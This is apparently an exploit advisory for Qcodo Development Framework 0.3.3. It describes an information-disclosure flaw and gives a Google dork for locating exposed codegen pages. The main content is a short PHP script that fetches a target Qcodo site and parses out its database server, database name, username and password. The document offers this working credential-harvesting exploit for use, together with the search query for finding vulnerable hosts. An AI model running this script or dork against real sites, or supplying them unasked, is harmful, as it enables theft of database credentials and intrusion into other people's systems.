34 lines
No EOL
1,018 B
Text
34 lines
No EOL
1,018 B
Text
# Exploit Title: Qcodo Development Framework 0.3.3 Full Info
|
|
Disclosure
|
|
# Google Dork: allintext: /qcodo/_devtools/codegen.php
|
|
# Date: 5/02/2011
|
|
# Author: Daniel Godoy
|
|
# Author Mail: DanielGodoy[at]GobiernoFederal[dot]com
|
|
# Author Web: www.delincuentedigital.com.ar
|
|
# Software Link: http://www.qcodo.com/
|
|
# Version: All
|
|
# Tested on: Linux
|
|
|
|
[Comment]
|
|
Agradezco a mis amigos: Hernan Jais, Alfonso Cuevas, Lisandro
|
|
Lezaeta, Nicolas Montanaro, Luciano Laporta Podazza,Oscar
|
|
Guerrero,Lucas Chavez,Inyexion, Login-Root, KikoArg, Ricota,
|
|
Xarnuz, Truenex, TsunamiBoom, _tty0, Big, Sunplace, Killerboy,Erick
|
|
Jordan,Animacco,
|
|
yojota, Pablin77, SPEED, Knet, Cereal, Yago, Rash, MagnoBalt, El
|
|
Rodrix, l0ve, her0
|
|
|
|
|
|
[Qcodo Exploit]
|
|
|
|
<?php
|
|
$sitio = 'http://locahost/qcodo/';
|
|
$source = file_get_contents($sitio);
|
|
$explodeo = explode("array",$source);
|
|
$explodeo2= explode("'",$explodeo[1]);
|
|
echo "server: $explodeo2[7]";
|
|
echo "<br>database: $explodeo2[13]";
|
|
echo "<br>username: $explodeo2[17]";
|
|
echo "<br>password: $explodeo2[21]";
|
|
|
|
?> |